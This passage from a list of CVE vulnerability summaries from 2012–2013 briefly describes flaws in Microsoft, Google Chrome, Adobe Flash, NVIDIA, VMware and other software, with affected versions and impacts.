Vulnerability." [CVE-2013-1323] Microsoft Publisher 2003 SP3 does not properly handle NULL values for unspecified data items, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Incorrect NULL Value Handling Vulnerability." [CVE-2013-1322] Microsoft Publisher 2003 SP3 does not properly check table range data, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Invalid Range Check Vulnerability." [CVE-2013-1321] Microsoft Publisher 2003 SP3 does not properly check the data type of an unspecified return value, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Return Value Validation Vulnerability." [CVE-2013-1320] Buffer overflow in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Buffer Overflow Vulnerability." [CVE-2013-1319] Microsoft Publisher 2003 SP3 does not properly check the return value of an unspecified method, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Return Value Handling Vulnerability." [CVE-2013-1318] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers access to an invalid pointer, aka "Publisher Corrupt Interface Pointer Vulnerability." [CVE-2013-1317] Integer overflow in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers an improper allocation-size calculation, aka "Publisher Integer Overflow Vulnerability." [CVE-2013-1316] Microsoft Publisher 2003 SP3 does not properly validate the size of an unspecified array, which allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Negative Value Allocation Vulnerability." [CVE-2013-1312] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1311] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1310] Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1309] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-2551. [CVE-2013-1308] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1309 and CVE-2013-2551. [CVE-2013-1307] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-0811. [CVE-2013-1306] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1313. [CVE-2013-1304] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1338. [CVE-2013-1303] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338. [CVE-2013-1302] Microsoft Communicator 2007 R2, Lync 2010, Lync 2010 Attendee, and Lync Server 2013 do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an invitation that triggers access to a deleted object, aka "Lync RCE Vulnerability." [CVE-2013-1301] Microsoft Visio 2003 SP3 2007 SP3, and 2010 SP1 allows remote attackers to read arbitrary files via an XML document containing an external entity declaration in conjunction with an entity reference, aka "XML External Entities Resolution Vulnerability." [CVE-2013-1297] Microsoft Internet Explorer 6 through 8 does not properly restrict data access by VBScript, which allows remote attackers to perform cross-domain reading of JSON files via a crafted web site, aka "JSON Array Information Disclosure Vulnerability." [CVE-2013-1296] The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote Desktop Connection Client 6.1 and 7.0 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a web page that triggers access to a deleted object, and allows remote RDP servers to execute arbitrary code via unspecified vectors that trigger access to a deleted object, aka "RDP ActiveX Control Remote Code Execution Vulnerability." [CVE-2013-1290] Microsoft SharePoint Server 2013, in certain configurations involving legacy My Sites, does not properly establish default access controls for a SharePoint list, which allows remote authenticated users to bypass intended restrictions on reading list items via a direct request for a list's location, aka "Incorrect Access Rights Information Disclosure Vulnerability." [CVE-2013-1289] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1, Groove Server 2010 SP1, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2013-1288] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CTreeNode Use After Free Vulnerability." [CVE-2013-1282] The LDAP service in Microsoft Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services allows remote attackers to cause a denial of service (memory consumption and service outage) via a crafted query, aka "Memory Consumption Vulnerability." [CVE-2013-1192] The JAR files on Cisco Device Manager for Cisco MDS 9000 devices before 5.2.8, and Cisco Device Manager for Cisco Nexus 5000 devices, allow remote attackers to execute arbitrary commands on Windows client machines via a crafted element-manager.jnlp file, aka Bug IDs CSCty17417 and CSCty10802. [CVE-2013-1092] Multiple unquoted Windows search path vulnerabilities in Novell ZENworks Desktop Management (ZDM) 7 through 7.1 might allow local users to gain privileges via a Trojan horse "program" file in the C: folder, related to an attempted launch of (1) ZenRem32.exe or (2) wm.exe. [CVE-2013-1087] Cross-site scripting (XSS) vulnerability in the client in Novell GroupWise through 8.0.3 HP3, and 2012 through SP2, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML via the body of an e-mail message. [CVE-2013-0931] EMC RSA Authentication Agent 7.1.x before 7.1.2 on Windows does not enforce the Quick PIN Unlock timeout feature, which allows physically proximate attackers to bypass the passcode requirement for a screensaved session by entering a PIN after timeout expiration. [CVE-2013-0900] Race condition in the International Components for Unicode (ICU) functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2013-0899] Integer overflow in the padding implementation in the opus_packet_parse_impl function in src/opus_decoder.c in Opus before 1.0.2, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a long packet. [CVE-2013-0898] Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors involving a URL. [CVE-2013-0897] Off-by-one error in the PDF functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service via a crafted document. [CVE-2013-0896] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly manage memory during message handling for plug-ins, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2013-0894] Buffer overflow in the vorbis_parse_setup_hdr_floors function in the Vorbis decoder in vorbisdec.c in libavcodec in FFmpeg through 1.1.3, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (divide-by-zero error or out-of-bounds array access) or possibly have unspecified other impact via vectors involving a zero value for a bark map size. [CVE-2013-0893] Race condition in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to media. [CVE-2013-0892] Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service or possibly have other impact via unknown vectors. [CVE-2013-0891] Integer overflow in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a blob. [CVE-2013-0890] Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service (memory corruption) or possibly have other impact via unknown vectors. [CVE-2013-0889] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly enforce a user gesture requirement before proceeding with a file download, which might make it easier for remote attackers to execute arbitrary code via a crafted file. [CVE-2013-0888] Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (out-of-bounds read) via vectors related to a "user gesture check for dangerous file downloads." [CVE-2013-0887] The developer-tools process in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict privileges during interaction with a connected server, which has unspecified impact and attack vectors. [CVE-2013-0885] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict API privileges during interaction with the Chrome Web Store, which has unspecified impact and attack vectors. [CVE-2013-0884] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly load Native Client (aka NaCl) code, which has unspecified impact and attack vectors. [CVE-2013-0883] Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect read operation) via unspecified vectors. [CVE-2013-0882] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect memory access) or possibly have unspecified other impact via a large number of SVG parameters. [CVE-2013-0881] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect read operation) via crafted data in the Matroska container format. [CVE-2013-0880] Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to databases. [CVE-2013-0879] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly implement web audio nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2013-0840] Google Chrome before 24.0.1312.56 does not validate URLs during the opening of new windows, which has unspecified impact and remote attack vectors. [CVE-2013-0830] The IPC layer in Google Chrome before 24.0.1312.52 on Windows omits a NUL character required for termination of an unspecified data structure, which has unknown impact and attack vectors. [CVE-2013-0811] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1307. [CVE-2013-0799] Buffer overflow in the Mozilla Maintenance Service in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, and Thunderbird ESR 17.x before 17.0.5 on Windows allows local users to gain privileges via crafted arguments. [CVE-2013-0683] The DataSim and DataPid demonstration clients in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote servers to cause a denial of service (incorrect pointer access and client crash) via malformed data in a formatted text command. [CVE-2013-0682] Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 do not properly handle exceptions, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via malformed data in a formatted text command, leading to out-of-bounds access to (1) heap or (2) stack memory. [CVE-2013-0681] Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote attackers to cause a denial of service (NULL pointer dereference and application crash) via malformed data in a formatted text command. [CVE-2013-0680] Stack-based buffer overflow in the web server in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP header. [CVE-2013-0650] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-0649] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0648] Unspecified vulnerability in the ExternalInterface ActionScript functionality in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0647] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0646] Integer overflow in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-0645] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0644] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0643] The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, does not properly restrict privileges, which makes it easier for remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0642] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0639] Integer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0638] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0637] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0634] Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0633] Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0630] Buffer overflow in Adobe Flash Player before 10.3.183.50 and 11.x before 11.5.502.146 on Windows and Mac OS X, before 10.3.183.50 and 11.x before 11.2.202.261 on Linux, before 11.1.111.31 on Android 2.x and 3.x, and before 11.1.115.36 on Android 4.x [CVE-2013-0572] Cross-site scripting (XSS) vulnerability in IBM Document Connect for Application Support Facility (aka DC4ASF) before 1.0.0.1218 in Application Support Facility (ASF) 3.4 for z/OS on Windows, Linux, and AIX allows remote authenticated users to inject content, and conduct phishing attacks, via unspecified vectors. [CVE-2013-0571] Cross-site scripting (XSS) vulnerability in IBM Document Connect for Application Support Facility (aka DC4ASF) before 1.0.0.1218 in Application Support Facility (ASF) 3.4 for z/OS on Windows, Linux, and AIX allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0541] Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Windows, when a localOS registry is used in conjunction with WebSphere Identity Manger (WIM), allows local users to cause a denial of service (daemon crash) via unspecified vectors. [CVE-2013-0504] Buffer overflow in the broker service in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2013-0240] Gnome Online Accounts (GOA) 3.4.x, 3.6.x before 3.6.3, and 3.7.x before 3.7.5, does not properly validate SSL certificates when creating accounts such as Windows Live and Facebook accounts, which allows man-in-the-middle attackers to obtain sensitive information such as credentials by sniffing the network. [CVE-2013-0111] daemonu.exe (aka the NVIDIA Update Service Daemon), as distributed with the NVIDIA driver before 307.78, and Release 310 before 311.00, on Windows, lacks " (double quote) characters in the service path, which allows local users to gain privileges via a Trojan horse program. [CVE-2013-0110] nvSCPAPISvr.exe in the NVIDIA Stereoscopic 3D Driver service, as distributed with the NVIDIA driver before 307.78, and Release 310 before 311.00, on Windows, lacks " (double quote) characters in the service path, which allows local users to gain privileges via a Trojan horse program. [CVE-2013-0109] The NVIDIA driver before 307.78, and Release 310 before 311.00, in the NVIDIA Display Driver service on Windows does not properly handle exceptions, which allows local users to gain privileges or cause a denial of service (memory overwrite) via a crafted application. [CVE-2013-0095] Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for Mac 2011 before 14.3.2 allows remote attackers to trigger access to a remote URL and consequently confirm the rendering of an HTML e-mail message by including unspecified HTML5 elements and leveraging the installation of a WebKit browser on the victim's machine, aka "Unintended Content Loading Vulnerability." [CVE-2013-0094] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer removeChild Use After Free Vulnerability." [CVE-2013-0093] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer onBeforeCopy Use After Free Vulnerability." [CVE-2013-0092] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer GetMarkupPtr Use After Free Vulnerability." [CVE-2013-0091] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CElement Use After Free Vulnerability." [CVE-2013-0090] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CCaret Use After Free Vulnerability." [CVE-2013-0089] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkupBehaviorContext Use After Free Vulnerability." [CVE-2013-0088] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer saveHistory Use After Free Vulnerability." [CVE-2013-0087] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer OnResize Use After Free Vulnerability." [CVE-2013-0086] Microsoft OneNote 2010 SP1 does not properly determine buffer sizes during memory allocation, which allows remote attackers to obtain sensitive information via a crafted OneNote file, aka "Buffer Size Validation Vulnerability." [CVE-2013-0085] Buffer overflow in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to cause a denial of service (W3WP process crash and site outage) via a crafted URL, aka "Buffer Overflow Vulnerability." [CVE-2013-0084] Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability." [CVE-2013-0083] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via crafted content, leading to administrative command execution, aka "SharePoint XSS Vulnerability." [CVE-2013-0080] Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allow remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "Callback Function Vulnerability." [CVE-2013-0079] Microsoft Visio Viewer 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Visio file that triggers incorrect memory allocation, aka "Visio Viewer Tree Object Type Confusion Vulnerability." [CVE-2013-0074] Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 does not properly validate pointers during HTML object rendering, which allows remote attackers to execute arbitrary code via a crafted Silverlight application, aka "Silverlight Double Dereference Vulnerability." [CVE-2013-0030] The Vector Markup Language (VML) implementation in Microsoft Internet Explorer 6 through 10 does not properly allocate buffers, which allows remote attackers to execute arbitrary code via a crafted web site, aka "VML Memory Corruption Vulnerability." [CVE-2013-0029] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CHTML Use After Free Vulnerability." [CVE-2013-0028] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CObjectElement Use After Free Vulnerability." [CVE-2013-0027] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CPasteCommand Use After Free Vulnerability." [CVE-2013-0026] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer InsertElement Use After Free Vulnerability." [CVE-2013-0025] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SLayoutRun Use After Free Vulnerability." [CVE-2013-0024] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer pasteHTML Use After Free Vulnerability." [CVE-2013-0023] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CDispNode Use After Free Vulnerability." [CVE-2013-0022] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability." [CVE-2013-0021] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer vtable Use After Free Vulnerability." [CVE-2013-0020] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkup Use After Free Vulnerability." [CVE-2013-0019] Use-after-free vulnerability in Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer COmWindowProxy Use After Free Vulnerability." [CVE-2013-0018] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SetCapture Use After Free Vulnerability." [CVE-2013-0015] Microsoft Internet Explorer 6 through 9 does not properly perform auto-selection of the Shift JIS encoding, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability." [CVE-2013-0010] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0009. [CVE-2013-0009] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0010. [CVE-2013-0007] Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML XSLT Vulnerability." [CVE-2013-0006] Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML Integer Truncation Vulnerability." [CVE-2013-0004] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate the permissions of objects in memory, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Double Construction Vulnerability." [CVE-2013-0003] Buffer overflow in a System.DirectoryServices.Protocols (S.DS.P) namespace method in Microsoft .NET Framework 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a missing array-size check during a memory copy operation, aka "S.DS.P Buffer Overflow Vulnerability." [CVE-2012-6533] Buffer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and Encryption Desktop 10.3.0 before MP1 on Windows XP and Server 2003 allows local users to gain privileges via a crafted application. [CVE-2012-6502] Microsoft Internet Explorer before 10 allows remote attackers to obtain sensitive information about the existence of files, and read certain data from files, via a UNC share pathname in the SRC attribute of a SCRIPT element, as demonstrated by reading a name-value pair from a local file via a \\127.0.0.1\C$\ sequence. [CVE-2012-5678] Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5677] Integer overflow in Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5676] Buffer overflow in Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5673] Unspecified vulnerability in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5672] Microsoft Excel Viewer (aka Xlview.exe) and Excel in Microsoft Office 2007 (aka Office 12) allow remote attackers to cause a denial of service (read access violation and application crash) via a crafted spreadsheet file, as demonstrated by a .xls file with battery voltage data. [CVE-2012-5459] Untrusted search path vulnerability in VMware Workstation 8.x before 8.0.5 and VMware Player 4.x before 4.0.5 on Windows allows host OS users to gain host OS privileges via a Trojan horse DLL in a "system folder." [CVE-2012-5458] VMware Workstation 8.x before 8.0.5 and VMware Player 4.x before 4.0.5 on Windows use weak permissions for unspecified process threads, which allows host OS users to gain host OS privileges via a crafted application. [CVE-2012-5429] The VPN driver in 